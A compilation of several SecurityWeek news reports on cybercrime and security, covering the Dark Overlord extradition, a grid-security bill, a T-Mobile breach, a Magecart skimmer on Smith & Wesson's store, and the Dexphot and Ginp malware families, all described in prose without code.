Alleged Member of ‘Dark Overlord’ Hacker Group Extradited From UK to US

Alleged Member of ‘Dark Overlord’ Hacker Group Extradited From UK to US

A UK national suspected of being a member of the notorious hacker group called The Dark Overlord has been extradited to the United States, the U.S. Department of Justice announced on Wednesday.

Nathan Wyatt, 39, has been charged by U.S. authorities on six counts of aggravated identity theft, threatening to damage a protected computer, and conspiracy.

The Dark Overlord hacked into the systems of many companies in the United Kingdom and the United States. The cybercriminals stole information from the targeted organizations and used that information to convince them to pay a ransom.

According to the indictment made public by the Justice Department, Wyatt used phone and email accounts to send threatening messages to The Dark Overlord victims in an effort to get them to pay up.

Victims included companies in the film, healthcare, finance, legal and various other industries. U.S. prosecutors have focused on the attacks targeting one accounting and four healthcare companies.

The indictment references Wyatt’s alleged activities from February 2016 until June 2017. Wyatt has been in jail in the United Kingdom since 2017 after pleading guilty to separate charges related to blackmail, possession of a fake passport, and using stolen payment card data.

“Today’s extradition shows that the hackers hiding behind The Dark Overlord moniker will be held accountable for their alleged extortion of American companies,” said Brian A. Benczkowski, assistant attorney general for the Criminal Division of the Department of Justice. “We are thankful for the close cooperation of our partners in the United Kingdom in ensuring that the defendant will face justice in U.S. court.”

In May 2018, police in Serbia claimed to have arrested another alleged member of The Dark Overlord, but Motherboard reported at the time that the group had continued to operate.

Related: First Cypriot to Be Extradited to US, on Hacking Charges

Related: Nigerian Extradited to U.S. Over Role in Major Cybercrime Scheme

Related: Russian Accused of $20M Credit Card Fraud Extradited to US

Related: Lithuanian Extradited to U.S. Over Hacking, Fraud Charges

view counter

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Tags:

Source: Alleged Member of ‘Dark Overlord’ Hacker Group Extradited From UK to US

Bill to Protect U.S. Energy Grid From Cyberattacks Passes With NDAA

Bill to Protect U.S. Energy Grid From Cyberattacks Passes With NDAA

Legislation that aims to protect the U.S. energy grid from cyberattacks passed the House this week after being added to the 2020 National Defense Authorization Act (NDAA).

The 2020 NDAA passed the House by a vote of 377 to 48 and President Donald Trump is expected to sign it soon.

The annual military bill includes the Securing Energy Infrastructure Act, which establishes a two-year pilot program within Energy Department national laboratories with the goal of identifying vulnerabilities and isolating critical grid systems.

The Securing Energy Infrastructure Act was introduced by Sen. Angus King and Sen. Jim Risch, and a companion bill has been introduced in the House of Representatives by Rep. Dutch Ruppersberger and Rep. John Carter.

The bill proposes solutions such as the use of analog backup systems, which could prevent cyberattacks from causing too much damage.

“This approach seeks to thwart even the most sophisticated cyber-adversaries who, if they are intent on accessing the grid, would have to actually physically touch the equipment, thereby making cyber-attacks much more difficult,” according to a press release from Sen. Angus’ office.

The bill also requires the creation of a working group that would analyze the solutions proposed by national laboratories and develop a national strategy for protecting the energy grid.

“The energy grid powers our financial transactions, communications networks, healthcare services and most of our daily life– so if this critical infrastructure is compromised by a hacker, these building blocks of American life are at risk,” said Senator King. “Protecting our energy grid is commonsense, bipartisan, and vital to national security, and I’m happy this year’s NDAA will enshrine this needed provision into law.”

The cyber and physical security of North America’s energy grid was tested recently as part of a major exercise called GridEx V. More than 6,500 participants representing more than 425 government and energy sector organizations in the United States, Canada and Mexico took part in the two-day exercise.

Earlier this year, a power utility in the U.S. reported interruptions to electrical system operations as a result of a denial-of-service (DoS) attack that involved the exploitation of a known vulnerability in Cisco firewalls.

Related: House Passes Bill to Enhance Industrial Cybersecurity

Related: U.S. Energy Firm Fined $2.7 Million Over Data Security Incident

Related: U.S. to Help Secure Baltic Energy Grid Against Cyber Attacks

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Tags:

Source: Bill to Protect U.S. Energy Grid From Cyberattacks Passes With NDAA

Hackers Accessed Information of T-Mobile Prepaid Customers

Hackers Accessed Information of T-Mobile Prepaid Customers

T-Mobile informed some prepaid customers this week that their personal information may have been compromised as a result of a hacker attack.

The company said it recently noticed unauthorized access to some prepaid wireless accounts. These accounts can store names, billing addresses, phone numbers, account numbers, and details about the customer’s mobile plans and features (e.g. whether they use an international calling feature).

This last piece of information represents customer proprietary network information (CPNI) under rules of the U.S. Federal Communications Commission (FCC), which is why the company is required to notify impacted individuals. The telecoms firm has also informed authorities of the incident.

T-Mobile says the incident did not involve any financial information (such as payment card data), social security numbers, or passwords.

Impacted customers have been notified via SMS and they have been urged to confirm or update their PIN on their T-Mobile account for extra protection.

No details have been disclosed about the attack itself and it’s unclear how many customers have been impacted. However, given that T-Mobile has millions of prepaid customers, even a small percentage could mean a significant number of victims.

The disclosure of this incident comes roughly one year after T-Mobile admitted that it had suffered a data breach impacting over 2 million customers. That attack also resulted in personal information getting accessed by hackers.

Related: Swisscom Breach Hits 800,000 Customers

Related: Industry Reactions to Nation-State Hacking of Global Telcos

Related: Bell Canada Hit by Data Breach

view counter

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Tags:

Source: Hackers Accessed Information of T-Mobile Prepaid Customers

Website of Gunmaker Smith & Wesson Hacked in Magecart Attack

Website of Gunmaker Smith & Wesson Hacked in Magecart Attack

The website of American gunmaker Smith & Wesson was hacked late last month and the hackers planted malicious code designed to steal customers’ payment card information

According to Willem de Groot of Netherlands-based ecommerce fraud protection company Sanguine Security, the attackers planted a payment skimmer on the Smith & Wesson online store on November 27.

The expert has pointed out that the Smith & Wesson store loads malicious code from a domain set up by the attackers. The skimmer captures personal and financial information entered by users on the checkout page and sends it to the cybercrooks.

The attack appears to be the work of one of the several threat groups specializing in Magecart attacks, which involve planting credit card skimmers either directly on the targeted online stores or through companies providing services to online shops.

De Groot says the skimming code and infrastructure used in the Smith & Wesson attack is identical to one spotted in a campaign impersonating Sanguine Security. In that operation, Magecart hackers registered fake Sanguine Security domains under De Groot’s name, and they used those domains to “funnel stolen payments.”

Magento contributor Daniel Ruf suggested that the attackers exploited a known vulnerability in the Magento ecommerce platform to hack the Smith & Wesson website. SecurityWeek can confirm that the Smith & Wesson online store appears to run on Magento.

Magento issued a warning recently, urging customers to install patches for a remote code execution vulnerability that can be exploited by unauthenticated hackers to deliver malware.

SecurityWeek has reached out to Smith & Wesson for comment and will update this article if the company responds. The malicious code is still present on the organization’s website at the time of writing.

Smith & Wesson website hacked

The official website of Macy’s was also compromised recently as a result of a Magecart attack and the company’s stock dropped 10 percent after news of the data breach broke.

Related: Magecart Attack on eCommerce Platform Hits Thousands of Online Shops

Related: Magecart Hackers Target Mobile Users of Hotel Websites

Related: Magecart Group Tied to Cobalt Hackers

view counter

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Tags:

Source: Website of Gunmaker Smith & Wesson Hacked in Magecart Attack

Dexphot Malware Uses Randomization, Encryption, and Polymorphism to Evade Detection

Dexphot Malware Uses Randomization, Encryption, and Polymorphism to Evade Detection

Malware that Microsoft has been tracking for over a year has been leveraging numerous techniques for evasion, including random file names, fileless installation, and polymorphism.

Microsoft, which calls the malware Dexphot, noticed that it attempted to deploy files that changed two or three times per hour. Targeting thousands of devices, the polymorphic malware was running code directly in memory and hijacking legitimate system processes to evade detection.

Large-scale at first, the campaign dropped in intensity over time, and only a few machines still encounter Dexphot-related malicious behavior.

Dexphot’s infection process starts with the writing of five files to disk: an installer with two URLs, an MSI file, a password-protected ZIP archive, a loader DLL extracted from the archive, and an encrypted data file containing three additional executables.

The malware abuses numerous legitimate system processes during execution, such as msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe in early stages, and svchost.exe, tracert.exe, and setup.exe in later stages.

The Dexphot installer is dropped and executed by SoftwareBundler:Win32/ICLoader and its variants. The installer then leverages two URLs to fetch malicious payloads (the same URLs are later used for persistence, updates, and re-infection).

An MSI package is downloaded from one URL and msiexec.exe used for a silent install. A batch script in Dexphot’s package is first executed when the installation process starts, to check for antivirus products.

The malware checks for the presence of antivirus products from Avast and AVG, as well as for Windows Defender Antivirus, and the infection is halted if such an application is found.

Otherwise, the password-protected ZIP archive is decompressed to extract the loader DLL, an encrypted data file and an unrelated DLL.

Next, process hollowing is used: the loader DLL targets two legitimate system processes and spawns them in suspended state, then replaces their contents with two malicious executables, after which it releases them from suspension.

The setup.exe process is then targeted and its contents replaced with a third executable, a cryptocurrency miner.

The first two executables represent monitoring services for Dexphot’s components, ensuring persistence. Each checks the status of all three malicious processes and, if any is terminated, begins re-infection. The monitoring services also check for cmd.exe processes and terminate them immediately.

The malware also creates scheduled tasks, as a persistence fail-safe. These tasks run malicious code using msiexec.exe as a proxy and also allow Dexphot to update components.

Multiple levels of polymorphism is used, with each MSI package being unique, due to the included files: a clean version of unzip.exe, a password-protected ZIP file, and a batch script. The script is not always preset and the names of other files and the password for the ZIP file change for each package.

The content of the loader DLL is also different from one package to another, the same as the encrypted data in the ZIP file.

The domains used in the attacks follow a similar pattern, with the file name for the payload randomly created. Many of the domains were used for a long time, but the MSI packages were frequently changed or updated. Overall, Microsoft identified around 200 unique Dexphot domains.

“Dexphot is not the type of attack that generates mainstream media attention; it’s one of the countless malware campaigns that are active at any given time. […] Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit,” Microsoft concludes.

Related: ‘Cloud Atlas’ Cyberspies Use Polymorphic Malware in Government Attacks

Related: Dridex Employs Polymorphism in Recent Campaign

Ionut Arghire is an international correspondent for SecurityWeek.

Tags:

Source: Dexphot Malware Uses Randomization, Encryption, and Polymorphism to Evade Detection

New ‘Ginp’ Android Trojan Targets Credentials, Payment Card Data

New ‘Ginp’ Android Trojan Targets Credentials, Payment Card Data

A recently discovered Android banking Trojan that features a narrow target list and two-step overlays is capable of stealing both login credentials and credit card data, ThreatFabric reports.

Dubbed Ginp and identified in October, the malware has been around since June and has seen five major updates since, with the latest bringing pieces of code copied from the Anubis banking Trojan.

Initially, Ginp was masquerading as a “Google Play Verificator” app and was focused on stealing the victim’s SMS messages. In August, it was updated with banking-specific features and started posing as fake “Adobe Flash Player” apps.

By abusing the Accessibility Service, the malware could perform overlay attacks and set itself as the default SMS app. Its generic credit card grabber targeted programs such as Google Play, Facebook, WhatsApp, Chrome, Skype, Instagram and Twitter. A third version added payload obfuscation and Snapchat and Viber to the target list.

The next version introduced code taken from Anubis — the malware’s source code was leaked earlier this year — and switched to a new overlay target list, focused on banks. It now targets 24 apps belonging to seven different Spanish banks: CaixaBank, Bankinter, Bankia, BBVA, EVO Banco, Kutxabank and Santander.

Detected this month, the most recent version of the malware brings only small modifications, including a new endpoint apparently related to downloading a module, likely with new features or configurations.

Once executed on the victim device, the malware removes its icon from the app drawer, then asks for the Accessibility Service privilege. As soon as it receives these privileges, the malware grants itself additional permissions to be able to send messages and make calls.

Based on received commands, Ginp can send or harvest SMS messages, update the command and control (C&C) URL, update the target list, request admin privileges, set itself as the default SMS app, prevent the user from disabling Accessibility Services, enable overlay attacks, get installed apps or contacts, enable call forwarding, and hide itself and prevent removal, among others.

In addition to requesting the victim’s login credentials, the malware’s overlays demand credit card details, claiming they are necessary to validate the user’s identity. Once this second step has been completed, the successfully targeted application will be ignored in future attacks.

Simple but effective, Ginp is expected to evolve, likely adding some more capabilities taken from Anubis. Within 5 months, its authors have proven they can build a Trojan from scratch and pack it with powerful capabilities.

“Ginp’s unusual target selection is not just about its focus on Spanish banks but also the wide selection of targeted apps per bank. The fact that the overlay screens are almost identical to the legitimate banking apps suggests that the actors might be very familiar with the Spanish banking applications and might even be accustomed to the language,” ThreatFabric points out.

Given that the path used in the inject requests contains the country code of the targeted institution, ThreatFabric believes that the malware author is already planning an expansion to additional countries or regions.

Related: Researchers Find 17,490 Anubis Android Malware Samples

Related: New Strain of Android Malware Found on Third-Party App Store

Ionut Arghire is an international correspondent for SecurityWeek.